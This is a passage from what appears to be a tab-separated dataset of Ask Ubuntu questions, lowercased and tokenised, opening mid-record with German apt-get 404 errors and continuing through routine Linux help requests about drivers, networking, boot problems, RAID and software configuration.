//archive.ubuntu.com precise-updates/restricted translation-en ign http : //archive.ubuntu.com precise-updates/universe translation-de_de ign http : //archive.ubuntu.com precise-updates/universe translation-de ign http : //archive.ubuntu.com precise-updates/universe translation-en ign http : //archive.ubuntu.com precise-backports/main translation-de_de ign http : //archive.ubuntu.com precise-backports/main translation-de ign http : //archive.ubuntu.com precise-backports/main translation-en ign http : //archive.ubuntu.com precise-backports/multiverse translation-de_de ign http : //archive.ubuntu.com precise-backports/multiverse translation-de ign http : //archive.ubuntu.com precise-backports/multiverse translation-en ign http : //archive.ubuntu.com precise-backports/restricted translation-de_de ign http : //archive.ubuntu.com precise-backports/restricted translation-de ign http : //archive.ubuntu.com precise-backports/restricted translation-en ign http : //archive.ubuntu.com precise-backports/universe translation-de_de ign http : //archive.ubuntu.com precise-backports/universe translation-de ign http : //archive.ubuntu.com precise-backports/universe translation-en es wurden 11,0 mb in 33 s geholt ( 323 kb/s ) w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/main/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/restricted/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/universe/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/multiverse/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/main/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/universe/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/main/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/restricted/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/universe/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/multiverse/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/main/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/universe/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-updates/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/main/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/restricted/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/universe/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/multiverse/source/sources 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/main/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/universe/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] w : fehlschlag beim holen von http : //archive.ubuntu.com/dists/precise-backports/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.202 80 ] e : manche indexdateien konnten nicht heruntergeladen werden . sie wurden ignoriert oder an ihrer stelle 채ltere verwendet . what can i do to fix this ?
230710	how do i hide the tab bar in chromium for a smoother web app experience ?	after playing around ( as in forgot to install chromium-addon for integration and losing half a day to find that out ) with unity-webapps i finally got them to work . problem is , if i access a web app from the starter panel , they show the standard chromium tab bar : . i can not open a new tab and if i close the tab the whole window will close ( fine so far ) . so i was wondering if there is a way of removing the tabbar from webapps or configure them so that they will open in firefox ( where i could hide the tabbar in options ) . i however do n't want to use firefox as my standard browser . any tips ? cheers in advance !
230712	can i download ubuntu 12.04 on a notebook/laptop ?	iâ´ve had some problems with my ubuntu instalation . i considered reinstalling the os completely , but the downloads for ubuntu 12.04 i find online say they are desktop downloads . can i use one of these downloads for my notebook , or is there a different download i should be looking for ?
230717	mail attachment in eml sent from thunderbird not opening in ms outlook	i am using ubuntu 12.04 with thunderbird mail client 13.0.1 , but when i am sending some mail attachment in .eml format , its not opening in ms outlook in windows ? though through ubuntu 11.04 it is working fine ... can anyone please help .
230720	ubuntu 12.10 usb startup brought settings from the last computer	i used a usb to put 12.10 on a dell laptop . everything is working fine . i used the same usb to put it on a dell desktop . ubuntu is not working well on the desktop and in settings , claims to be the laptop ( system settings ) . i would like to know how to make it reset . i think that it has graphics settings it picked up from the laptop installation . what should i do ?
230725	building and migrating to software raid 5 array	i am hoping to build and migrate to a software raid 5 array . i am working with ubuntu 12.04.1 lts 64-bit . i currently have three drives : /dev/sda1 which is a 60g solid state drive which contains my root directory and serves as my boot drive ; /dev/sdb2 which is a 1.5t standard hard drive that mounts in my home directory and acts as my main storage and also contains swap space ; /dev/sdc1 which is a 1.5t standard hard drive that mounts in media which i have been using for back up . now that /dev/sdb2 is full i am reconsidering my data management approach . i am considering buying another 1.5t drive and using it with the other two to form a single raid 5 array hopefully mounted in my home directory . i would like to migrate to the array without destroying the data currently held on /dev/sdb2 . how should i go about doing this ?
230732	how to eliminate windows partition	i am preparing to update ubuntu on an old laptop . originally windows was hacked and i had an ubuntu image ( from school ) on cd and launched it with no computer iq and was back online surfing the web in aprox 10 minutes . love at first bite ! but the way i went about it , the windows partition is half my discspace . now i want to give ubuntu the whole territory when i load the new updated image . will there be a screen asking if i want to partition or allow ubuntu the entire hd ?
230733	black screen on booting into ubuntoon windows 7 pc - nvidia card	i installed ubuntu 10.04 desktop amd 64 on a pc running windows 7 and the dual booting worked just fine , but `` something '' happened . now , when choosing ubuntu at start-up , only a blank screen appears . since the graphics card is nvidia ( gpu processor : geforce 6150se nforce 430 driver version : 186.55 ) , i hoped the following steps from another post would help : if your graphics card is nvidia , follow these steps : in the grub menu at startup , press `` e '' ; then use the arrow keys to replace quiet splash with no splash or nomodeset . then press the ctrl+x key combination to boot . there is no `` quiet splash '' text to edit . i tried adding `` no splash '' as the final line , but upon `` ctrl-x '' , the system booted into windows , which is the default .
230737	how to see conversation history in `` pidgin messenger '' when using ubuntu ?	i use `` pidgin '' on ubuntu instead of yahoo messenger , and i recently noticed that when i am offline and somebody writes me , `` pidgin '' wo n't show it to me as offline messages , or when i write to my friend by `` pidgin '' while my friend is offline , he wo n't get my offline messages either , and i did n't see an option to see conversation history . how can i fix these 3 problems ?
230739	kubuntu 12.04 no longer associates to wireless networks	somehow , my laptop does not associate to my wireless network anymore , while it did before . throughout the time it stopped working , i did not perform any upgrades ( kernel , nor applications ) . about my system : laptop is a dell inspiron 1505 integrated wifi adapter based on the broadcom bc-4311 chipset . kubuntu 12.04 with all updates in place kernel is 3.2.0-34-generic output from lspci : 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) output from ifconfig wlan0 : wlan0 link encap : ethernet hwaddr 00:19:7e:06 : b4 : e3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) there is no ip assigned , but i figure that 's due to the fact that i am not connected to a wireless network . settings - > system settings - > network settings - > wireless tab - > add - > scan does show available wireless networks . i see my network ( identified by its ssid ) listed , i am able to select it and add it , but i am never prompted for a password as i expected it to do . the wired lan connection seems to work fine . i have disabled the splash screen so i can watch the bootup process , and there did n't seem to be anything out of the ordinary going on . except for one thing ; after logging in , kwallet did not prompt me for its password , and the laptop never connects to my wireless network . nothing has been changed on the router , and all of my other wireless devices continue to connect without issues . thank you in advance for any help you can offer . if there is any additional information you require , please do n't hesitate to let me know . i am relatively new to linux and to linux forum etiquette , so please bear with me .
230740	compiz takes too much resources	i noticed that compiz is taking an awful lot of resources when not doing anything special . i 've done some research and found that there are other people with alike problems , but i could n't find a solution . is there anything i can do , any upcoming patch to solve this or any alternative to compiz ? thanks !
230742	firefox image background turned grainy	i 've been tinkering a lot with the drivers for my intel hd graphics cpu - installing different drivers and activating sna . so far without breaking anything . the only change i 've noticed is that the background colour when viewing an image in firefox ( when the url is the exact location of an image file , that is ) has changed . the default colour for this has been dark grey for some time . for me it has changed to a sort of grainy grey melange colour : is this due to my graphics settings - or is it due to a firefox update , i have n't been able to track down ? thanks !
230746	how can i see which video card on my optimus-enabled machine is being used ?	i 'm using ubuntu 12.04.1 lts on my optimus-enabled asus k55v notebook . this means it features two video cards ; an integrated intel one ( 1gb shared memory ) , and a discrete nvidia geforce 610m . regarding this , i have a few related questions : how can i tell if my system is using the graphic card at all , and if so , how much ? how do i determine whether the drivers of the intel graphics are installed or not ? i tried downloading the drivers from nvidia 's official website , but it did not install . from where do i get the drivers for nvidia ? how can i make the best use of the nvidia graphics card ( i.e . in what applications ) ?
230748	partial upgrade from 10.4 hangs	so i 've been putting off doing updates and upgrades for ages , and plus because i do n't want unity and like having the window list not grouped at the bottom and having the character palette at the top 'cause i have to write with foreign characters quite often so it 's handy but i finally went to do a partial upgrade today , as suggested by the update manager , and i 've left it to do its stuff but it 's been stuck on : unpacking replacement libc-bin ... for over 3 hours now . what can i do to push it along , or what could be stopping it from progressing ?
230759	/etc/profile vs ~/.profile	i run ubuntu 12.04.1 lts . and i ca n't get what is the order/priority for loading profile files . when i start the system and login using gui which file is loaded ? and why ? what if run login-shell ? will it be the same ? actually right now i ca n't get why my ~/.profile does n't load when system starts because here i see it should : https : //help.ubuntu.com/community/environmentvariables
230760	setting up bridge to tun0 ( openvpn )	i have two networks , with one machine that is supposed to act as bridge between them . the bridge host is a ubuntu 12.04 ( 64bit ) connecting via openvpn to a remote network . the local network is 172.16.x.x , the remote one 192.168.y.y . i have been able to configure the bridge , br0 , to include eth0 , but i can not get it to include tun0 as well ( neither from the command line with brctrl - error : ca n't add tun0 to bridge br0 : invalid argument - nor in /etc/network/interfaces ) . however , tun0 is the interface used by openvpn and therefore i reckon i need it . also brctrl show does n't even list tun0 even though i put it on the bridge_ports line in interfaces . now the openvpn connection obviously requires either eth0 to have a connection already , or br0 has to be up to establish the connection . this seems like a catch 22 . the idea is to configure routes for the 192.168.y.0/24 network to go through this bridge host . so i do not want to nat here . i 'm flexible when it comes to using ebtables , iptables or whatever to facilitate this , but at the moment i am at a loss . okay strictly speaking i do n't have to use bridging . but for routing i can not see how that would bridge the gap between tun0 and eth0 ...
230762	how do i install the nvidia driver for my nvidia geforce 6150 le on ubuntu 12.04 lts ?	i have tried all the propriety drivers and my i still do n't see that it 's installed under the system settings/system/details . i get unknown under the graphics section.how can i fix this . please help .
230763	new file in ubuntu kernel ppa repository to install ?	googling this question has n't brought me to anything so i decided to ask here . recently i noticed on kernel.org that kernel 3.7 finally considered to be a stable so i decided to upgrade , since i am on 3.7 rc7 but when i opened http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.7.1-raring/ i noticed new file ( actually 2 which seems to be identical ) linux-headers-3.7.1-030701-omap_3.7.1-030701.201212171620_armhf.deb and linux-image-3.7.1-030701-omap_3.7.1-030701.201212171620_armhf.deb so my question is should i install those as well or continue installing only 4 files ( e.g . 3 amd64 image and headers + all headers ) ? thank you .
230766	how lsb module affects system , and can be made available to the system ?	aks @ aks-k55vd : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise used the command lsb_release -a and found 'no lsb modules are available' lsb- > http : //en.wikipedia.org/wiki/linux_standard_base what does that mean by the unavailability of this module and how can they be made available to my system ?
230767	disable notifications for certain programs ?	i 'm using ubuntu 12.04 with xfce-4 . i would like to use thunderbird 's own notification , but activating that turns into 3 messages per new mail : one from thunderbird with mail info one general with mail info one just saying `` you have new mail '' and `` no default action '' . is it possible to exclude thunderbird from the general notification ? i would like to keep the other programs calling xfce4-notifyd .
230772	what is the windows equivalent of /usr/bin , etc	this may not be the best place to post this , but my question is asking the sort of the opposite of what is the equivalent to the windows `` program files '' folder ? . i 'm new to windows and am used to the unix style file system , where there are designated folders for certain types of files . i 'm wondering what the normal way to install programs is in windows , specifically ones that will be started from the cmd prompt . so far , i have been adding user environment variables for each program , and appending this variable to the path . so , for gvim , i would add gvim_home and then append to my path : % path % ; % gvim_home % but now i 'm wondering if i should just create a folder and add it to the path , and then put shortcuts to my exe 's into that folder . do any of you know the usual way this is done ?
230775	how to dual-boot windows xp & ubuntu 12.04	when i install ubuntu 12.04 along side windows xp , i encountered a choice for `` device for boot loader installation '' . i selected `` windows xp professional '' now , when i select windows xp from the grub , it appeares a black page and windwos dosent boot . i tried boot-repair from ubuntu but it dosent solve this problem . the only thing that helps me to boot windwos xp is a bootable cd of windows . when i put this cd and boot from cd , it shows some options and when i select `` boot from hard drive '' , my own windows boots ! here 's is a snippet from the bootinfoscript report : ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : grub2 ( v1.99-2.00 ) boot sector info : grub2 ( v1.99-2.00 ) is installed in the boot sector of sda1 and looks at sector 525709174 of the same hard drive for core.img , but core.img can not be found at this location . no errors found in the boot parameter block . boot file info : grub2 ( v1.97-1.98 ) in the file /mbr_backup.log looks at sector 1 of the same hard drive for core.img , but core.img can not be found at this location . operating system : windows xp boot files : /boot.ini /ntldr /ntdetect.com
230776	how to fix firefox in 12.04	this only happens with firefox . everything else runs fine . some specs : my computer is a dell demension c521 ; graphics : nvidia geforce 6150 le card how can i debug and fix the problem ?
230777	wi-fi stopped connecting on chrubuntu	i installed ubuntu ( 12.04 x64 ) on my cr-48 a few weeks ago . i 'm now visiting my parents and yesterday i started having an issue with wi-fi connectivity for the first time . at first i could connect to their network just fine . then i started having this issue where i would suddenly be disconnected from the network and the only way to restore connection was to reboot . i found something online about editing the specific network connection and de-selecting the `` available to all users '' option , which solved that problem temporarily . later that night i got disconnected from their wireless network again but i have n't been able to reconnect at all since . their router is old as hell , the best it can do is wep . could that have something to do with it ? my wife has had limited issues with a couple of her devices as well but nothing this severe and both of our phones are on the wi-fi as well as both of my parents laptops so i 'd like to rule out my machine before i tell my parents to go drop a hundred bucks on a new router . thanks in advance , guys .
230779	how can i find out my current gvfs version ?	i would like to know the official version number of my gvfs install . however none of the gvfs tools seems to offer a -v option . is there any other way ?
230780	is it possible to run laptop over direct supply and turn off battery charging ?	using ubuntu 12.04 over asus k55v i wonder if it is possible to turn off battery charging and run the system over direct supply ? ? ? this function is available with dell laptops in microsoft windows . is this function available within ubuntu ? ? ?
230786	nm applet dropdown options not working	i recently realized the dropdown options from my nm-applet are no longer working . but i can still control the network configuration by going through the dash . this happened very recently . i only realized this before a week . i guess some recent update screwed it up . i have these related packages installed network-manager-gnome 0.9.4.1-0ubuntu2 libnm-gtk0 0.9.4.1-0ubuntu2 network-manager 0.9.4.0-0ubuntu4.1 any help would be great .
230789	ubuntu one api java - how to use rest and accesstoken ?	i am writing a java app in eclipse that backups data to several consumer-cloud-services encrypted and redundant . so far , i successfully implemented the authentication process , as it is described in the documentation . at this point , i do not know how to proceed . the next step would be implementing the auth with the stored accesstoken and afterwars implementing upload/download/listing functionality through the rest api . i think i have to store the string oauth.getserialized ( ) . how do i authenticate with this string afterwards ? this does not work e.g . : authenticateresponse oauth = api.authenticate ( serialized ) ; api.setauthorizer ( new oauthauthorizer ( oauth ) ) ; can someone tell me please , how i can use the rest api with java ? there is no explanation or link in the developers area as far as i saw . and btw , i wasted at least one hour trying to fix errors , because some needed libraries are listet after the example code . : /
230790	different gearman server packages	what is the difference between the gearman-server package and the gearman-job-server package ? does one depend on the other ?
230794	starcraft 1 battlenet not working	so i downloaded starcraft 1 from blizzard.com , because that 's where i bought it , but when i go to play on battle.net , it tells me that battle.net was unable to identify my application version and that i may have a virus . now i know i do n't have a virus , so how can i make this work ?
230795	can not boot ubuntu 12.04 or 12.10	i can not get ubuntu to boot or run on my gaming build , while windows 7 runs fine . 12.04 boots to desktop on live disc and says i have a network connection , but firefox wo n't do anything but lock up . then the whole os locks up , making it unusable . 12.10 wo n't even boot i get an error saying kvm is disabled by bios . i do n't even own a kvm . if i turn intel virtualization on 12.10 just freezes during the ubuntu loading screen . i have tried resetting my bios to the defaults and tried booting with the option nomodeset , same results as before . i want to install ubuntu to an ssd i had laying around for a dual boot . my system specs : core i5 2500k @ 4.5ghz 8 gigs of corsair xms3 ddr3 1600 asus p8z68 v-pro/gen3 sapphire radeon hd 6970 ( 2 gig model ) power supply antec 750 watt high current gamer
230797	ca n't find new.h - getting gcc-4.2 on quantal ?	i 've been trying to compile the valve source sdk ( 2007 ) on my machine , but i keep running into the same error : in file included from ../public/tier1/interface.h:50:0 , from ../utils/serverplugin_sample/serverplugin_empty.cpp:13 : ../public/tier0/platform.h:46:17 : new.h : no such file or directory i 'm pretty new to c++ coding and compiling , but using apt-file search i tried to use every single suggestion for the required files in the makefile ( libstdc++.a and libgcc_eh.a ) , and none worked . i then found a note in the makefile saying gcc 4.2.2 is recommended - i assume the older code wo n't work with the newer version , but gcc-4.2 is unavailable in 12.10 . so my question/s is/are : if my assumption is right - how do i get gcc 4.2.2 on quantal ? if my assumption is wrong - what else could be the problem here ? relevant portion of the makefile : # compiler options ( gcc 3.4.1 will work - 4.2.2 recommended ) cc=/usr/bin/gcc cplus=/usr/bin/g++ clink=/usr/bin/gcc cpp_lib= '' /usr/lib/gcc/x86_64-w64-mingw32/4.6/libstdc++.a /usr/lib/gcc/x86_64-w64-mingw32/4.6/libgcc_eh.a '' # gcc 4.2.2 optimization flags , if you 're using anything below , do n't use these ! optflags=-o1 -fomit-frame-pointer -ffast-math -fforce-addr -funroll-loops -fthread-jumps -fcrossjumping -foptimize-sibling-calls -fcse-follow-jumps -fcse-skip-blocks -fgcse -fgcse-lm -fexpensive-optimizations -frerun-cse-after-loop -fcaller-saves -fpeephole2 -fschedule-insns2 -fsched-interblock -fsched-spec -fregmove -fstrict-overflow -fdelete-null-pointer-checks -freorder-blocks -freorder-functions -falign-functions -falign-jumps -falign-loops -falign-labels -ftree-vrp -ftree-pre -finline-functions -funswitch-loops -fgcse-after-reload # optflags= # put any compiler flags you want passed here user_cflags=-m32
230798	can not login other users since upgrade	i had 10.10 with 4 users and upgraded to 12.04.1 from cd . ( in the installation options it detected i had 10.10 and windows installed and i chose the option to upgrade keeping users and their homes and all possible apps ) now the main user works fine but there where none of the other users , only their home directories , so i decided to create new users with the same names and seems to worked fine , there was no extra home directory created so i assume it linked the newly created user with the home directory of the same name , but i ca n't log in . it accepts the password goes black and takes me back to the login screen ( lightdm ) if i create a new user with a different name it works fine but then it creates it 's own home directory .
230799	no network connection on an hp probook 4530s	i own a hp probook 4530s . i installed ubuntu 12.04 along side my windows 7 professional os . while in window 7 everything works properly in terms of wire and wireless connection . on ubuntu 12.04 my wired connection does n't work at all and wireless connection works only when i check off enable wireless then recheck enable wireless . when i recheck enable wireless , the wireless connection only works for about 30 seconds then it goes offline again .
230800	how do i test an image of ubuntu using the test tracker ?	i 've downloaded a ubuntu image and i would like to run some tests against that image . how can i test the image on my machine ? what tests are available to run and how can i report my results and bugs ?
230811	php configured with “magic_quotes_gpc=off” but phpinfo ( ) shows it as 'on '	i 've a problem on my ubuntu server 12.04 with php . as per /etc/php5/apache2/php.ini : ; http : //php.net/magic-quotes-gpc magic_quotes_gpc = off but the phpinfo.php says that magic quotes are on ... also sebastien @ thivinfo : ~ $ php -l /etc/php5/apache2/php.ini no syntax errors detected in /etc/php5/apache2/php.ini how
230813	( xubuntu ) no touchpad or mouse on aspire one d270	i installed xubuntu 12.10 on an aspire one d270 using a live usb . initially , the live usb would n't boot , but by running sudo apt-get dist-upgrade on it ( on a different machine ) , i upgraded the kernel and it now works perfectly . however , after installing xubuntu from the stick onto the d270 , neither the touchpad nor an external mouse works . if i use the keyboard to navigate to the mouse settings , the 'device ' setting is greyed out . i do n't see why the mouse should work perfectly when running from the live usb but not once installed to the machine ... ? thanks for any help .
230816	bluetooth keeps turning on	i am running 12.04 , and i have absolutely no use for bluetooth right now . i have turned it off , and after i turn it on again , it turns on . i have a dell latitude d830 . thanks for the help in advance additional info : it happened again ; i turned bluetooth off before i left , restarted the computer , and bluetooth was on . even more info : it seems to be doing this in somewhat of a pattern . sometimes it 's on , others its not .
230817	using makefile wildcard command for file names with spaces	i have a makefile that i use to compress pictures : src= $ ( wildcard photos/*.jpg ) $ ( wildcard photos/*.jpg ) out= $ ( subst photos , compressed , $ ( src ) ) all : $ ( out ) clean : @ rmdir -r compressed compressed : @ mkdir compressed compressed/ % .jpg : photos/ % .jpg compressed @ echo `` compressing $ < `` @ convert `` $ < `` -scale 20 % `` $ @ '' compressed/ % .jpg : photos/ % .jpg compressed @ echo `` compressing $ < `` @ convert `` $ < `` -scale 20 % `` $ @ '' however , when i have a picture with a space in its name , for example piper pa-28-236 dakota.jpg , i get this error : make : *** no rule to make target `compressed/piper ' , needed by `all ' . stop . i think this is a problem in the wildcard command , but i 'm not sure what to change to get it to work . how do i modify my makefile to allow for spaces in file names ?
230822	how to rollback an apt-get upgrade from command line ?	i remotely administer a 12.04 lts desktop and will periodically do sudo apt-get update sudo apt-get upgrade however , if the upgrade installs something that causes a system issue , i 'd like to roll it back to the previous version . is there a way to tell what items will be upgrade , along with the from/to versions ? once the upgrade is done , is there a way to restore the previous version ( and all its dependencies ) . for example , i see on my local machine , that there is a newer version of the flash player . historically , i 've had numerous issues with flash breaking things , so i 'm really concerned about blindly updating on this remote system and not being able to back it out . thoughts/suggestions ?
230823	associate program to a file where program is not in list	relative noob here . need help trying to figure this one out : i have a program ( guitar pro 6 ) that i want to associate to all .gpx files so that when i start such a file , it is started with that program . ubuntu 12.10 doesnt do that by default . it says it doesnt know which program to use and offers to identify that right program from a list . however , this program is not in the list . not to worry : so i read in this post http : //ubuntuforums.org/archive/index.php/t-1976921.html how people solved this in 12.04 ( by edditing '/usr/share/applications/guitar pro 6.desktop ' and adding % u to exec= line . however , in my situation ( difference being the release level ? ) it does n't work . any help is appreciated cheers , mat update : i finaly got word back from the guitarpro support team : '' about the file association issue , this seems to be more related to your computer , there is not feature in gp that will allow you to correct this . you might have to set your linux window manager to correct this . '' well this is no help , obviously again : its an anoyance more then a huge problem but i 'd still like to figure this one out . i 'm running regular compiz window manager btw . does anybody have any thoughts on how to fix this ? cheers
230825	how can non-admin users connect to wi-fi networks ?	i 'm trying to configure policykit so that other users are allowed to configure wi-fi connections , but my changes do n't seem to bring any results at all . when a non-admin user tries to connect to a new wi-fi , i get the system policy prevents modification of network settings for all users box . it asks for the admin user 's password . ok - that one goes via policykit , so i thought i 'll just change the configuration for action org.freedesktop.networkmanager.settings.modify.system . i created a file /etc/polkit-1/localauthority.conf.d/52-wifi-management.conf with content : [ wifi management ] identity=unix-group : netdev action=org.freedesktop.networkmanager . * resultany=no resultinactive=no resultactive=yes and added the user to the netdev group . but that did n't make any difference . there also does n't seem to be much possibility for debugging the auth process . what 's going wrong ? how do i make it work as i expect ?
230826	try ( hd0,0 ) : ntfs5 : no wubildr then the next line is try ( hdd0,1 ) : ntfs5:	i get this messasge once i have installed wubi-installer.org and downloaded and let the windows 7 installer install the program . i then have to select for the machine to restart then . as my machine come up i get the dual boot ino and select ubuntu then the next screen i get is a black screen with the following : try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : ntfs5 : i then have to ctl alt del and i can then select win 7 and machine comes right back up
230827	no filesystem could mount root	i am trying to boot a linux kernel 3.7.0 on virtualbox and it keeps telling me the same message : `` no filesystem could mount root tried ext3 ext4 vfat fusebk '' . i put append root=/dev/sda in my isolinux cfg file even though there is no file named /dev/sda .
230830	problem with sound in skype : ubuntu 12.04 on lenovo thinkpad e530	having problems with sound in skype in ubuntu 12.04 64 bit . the laptop is a lenovo thinkpad e530 . have tried various combinations in skype-settings , but i 'm not able to make a call as 'sound problems ' flashes up every time . the version of skype is 4.1.0.20 and the sound and microphone seem to work otherwise . 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 )
230832	squid or dansguardian : which should pass content to an antivirus product for scanning ?	i have an ubuntu server12.04 installation acting as a proxy server using squid 3.1.19 . squid has been configured to pass content to squidclamav 6.10 to check for viruses ( using icap ) : icap_service service_req reqmod_precache bypass=1 icap : //127.0.0.1:1344/squidclamav adaptation_access service_req allow all icap_service service_resp respmod_precache bypass=1 icap : //127.0.0.1:1344/squidclamav adaptation_access service_resp allow all the current setup works perfectly well , but now iâd like to install dansguardian to provide content filtering . like squid , the dansguardian config file ( /etc/dansguardian/dansguardian.conf ) can also be integrated with anti-virus products using the 'contentscanner ' directive . should i ignore the 'contentscanner ' directive in dansguardian and leave squid in charge of passing content to squidclamav . or should i have dansguardian pass content to an anti-virus product ? or should they both be passing content to anti-virus products ? whatâs considered best practice ? are there any advantages/disadvantages either way ?
230835	list existing x display names ?	how do i get a list of current x display names ? apart from being a useful thing to know , i want this so that ( hopefully ! ) i can use xcalib -invert -alter as suggested in this question to invert the second of two screens on my computer .
230841	how to rollback an lvm2 snapshot	what 's the equivalent of creating a snapshot and reverting to it later on in zfs ( which is automated and usually hassle-free ) in lvm2 ? i 've looked at the progress of this lvm2 feature a while ago and i 've seen somebody working on it but it was n't ready at the time . i 've heard that lvm2 apparently has this feature available now .
230843	installing matlab ubuntu 12.10 , persistent `` permission denied '' problem	i 'm trying to install matlab on ubuntu 12.10 , i had it in my last laptop with 12.04 and i did n't have much trouble to install it . i 'm getting this problem : j @ jgb : ~/programs/instaladores/matlab $ ./install preparing installation files ... installing ... ./install : 1 : eval : /tmp/mathworks_1436/sys/java/jre/glnxa64/jre/bin/java : permission denied finished and it does n't change if i change the permissions to the java file or to the install file as other posts say . in my /etc/fstab file i had this line added ( but nothing changes if i comment it ) : tmpfs /tmp tmpfs nodev , nosuid , noexec , mode=1777 0 0 thanks
230845	faience theme 12.10	i 'm trying to install the faience theme in ubuntu 12.10 with unity . i installed it from the ppa , then tried to use unsettings to apply it . i can apply all of the themes except for the window themes . the gtk and icon themes work fine . anybody have this problem ?
230851	how can i remove epiphany without removing gnome ?	i have gnome shell installed , and i want to remove the epiphany browser . but when i click uninstall in the software center its says that gnome-core is a dependency of epiphany , so it will be uninstalled too . is there anyway i can remove epiphany without removing gnome ? on running sudo apt-get -s remove epiphany as a commenter suggests , returns as not installed . its still in my program list though . i found out , the package that is installed is epiphany-browser . on running sudo apt-get -s remove epiphany-browser it still wants to remove gnome-core .
230859	wireless in hp pavilion g4 2210la does not start with ubuntu 21.10	brand new notebook which came with windows 8 . i switched to ubuntu 12.10 and key on/off wireless does not turn on and wireless stays disable
230868	how to reinstall pdl	i have tried to install perls pdl , and it didnt work so i tried to uninstall it i tried to use chmod the permissions and delete the perl/pdl folder in windows deledteing folders was very easy in ubuntu i cant figure out how to do it to i had to reinstall every thing , can someone show me how to manually delete a folder even tho it has root authority thanks -mark
230870	`xcalib -i -a` controls only one of two screens - can it control both ?	i am using 2 screens , and wish to invert the colors on both of them without using compiz ( i 'm using gnome shell ) . i can use xcalib -invert -alter as suggested in this question , but it only inverts one of the screens . is there a way to specify both of them , or even which of them , using xcalib ? is there another way ? with xcalib , you can specify which screen to alter with the -d ( -display ) or -s ( -screen ) options , but alas , x seems to be aware of just one screen : when i use the w command i only see one ( the usual `` :0 '' ) ps : this question was originally posted by k0pernikus as a comment here . -- -edit -- - this is the output of xrandr : screen 0 : minimum 320 x 200 , current 3200 x 1200 , maximum 8192 x 8192 vga-0 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dvi-0 connected 1920x1200+1280+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 i can use -s dvi-0 or -s vga-0 , but they do the same as -s :0
230874	blank screen after booting ubuntu	on booting my ubuntu system i see an ubuntu startup symbol , after that the screen goes blank like it 's going to boot up then it does nothing at all .
